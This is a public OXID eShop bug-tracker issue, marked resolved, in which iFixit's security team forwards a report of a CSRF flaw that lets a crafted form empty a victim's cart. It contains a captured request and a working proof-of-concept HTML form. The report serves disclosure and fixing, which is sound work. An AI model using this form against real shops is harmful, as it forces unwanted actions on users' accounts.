View Issue Details

IDProjectCategoryView StatusLast Update
0006674OXID eShop (all versions)4.04. Securitypublic2017-08-18 15:39
Reportermarco_steinhaeuser 
PrioritynormalSeverityminorReproducibilityalways
Status resolvedResolutionfixed 
Product Version4.10.5 / 5.3.5 
Target Version4.10.6 / 5.3.6Fixed in Version4.9.10 / 5.2.10 
Summary0006674: OXID potential CSFR bug
DescriptionOxid Security Team,
   We received a report of a CSRF bug on our site `[domain.com]`.

The jist is that a carefully crafted form can adjust cart item counts without a valid stoken or csrf protection mechanism. This is admittedly minor, but represents a valid security problem.

This could admittedly be a known issue that could be solved by updates, but we would like to confirm that this problem is known about and has been addressed.

-Daryl
iFixit Security Team



PS: Please find the original report included:

------------------------------------------------------------------

1. CSRF on the EU Store: I just need "aid" which is always same for victim as well suppose if the somehow i came to know that the product name which is in cart then i easily get aid value by searching the product and intercepting my own request and used in my CSRF code.

here is the POST request for the product that i want to search to find "aid"


POST /index.php?lang=1& HTTP/1.1
Host: [domain.com]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Referer: https://[domain.com]/index.php?cl=details&cnid=699a66f8a4ded03b5795313fdf6281fa&anid=04832587843313ab35bf29aaab5f2ab3&listtype=search&searchparam=iphone&&lang=1
Cookie: _ga=GA1.2.532387267.1494626478; session=2b0d5cf9090fc367f6ce8753e4d4edf1; settingsc=current_page%3D%252FUser%252Feu_sso%3A%3Alast_page%3D%252FGuide%252FUser%252Fdozuki_sso; __utmx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:0; __utmxx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:1494630243:8035200; _gid=GA1.2.120962297.1497571472; _ceg.s=ormp2a; _ceg.u=ormp2a; language=1; sid=1f446ae471b83173539929786a3ed2a3; sid_key=oxid
Connection: keep-alive
Upgrade-Insecure-Requests: 1

stoken=3614313A&lang=1&cnid=699a66f8a4ded03b5795313fdf6281fa&listtype=search&actcontrol=details&searchparam=iphone&cl=details&aid=04832587843313ab35bf29aaab5f2ab3&anid=04832587843313ab35bf29aaab5f2ab3&parentid=0482063b7baac91cda48cf68bb0c660d&panid=&fnc=tobasket&varselid%5B0%5D=e90dfb84e30edf611e326eeb04d680de&am=1

in this i only need aid that is same for victim as well. i only need to change the aid in my csrf code. and no need of any token. and now am gonna send this file to victim. and his/her cart got empty

here is the CSRF code for that
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://[domain.com]/index.php">
      <input type="hidden" name="lang" value="1" />
      <input type="hidden" name="cl" value="basket" />
      <input type="hidden" name="fnc" value="changebasket" />
      <input type="hidden" name="override" value="1" />
      <input type="hidden" name="aid" value="04832587843313ab35bf29aaab5f2ab3" />
      <input type="hidden" name="am" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
TagsNo tags attached.
ThemeNot defined
BrowserNot defined
PHP VersionNot defined
MySQL VersionNot defined

Activities

There are no notes attached to this issue.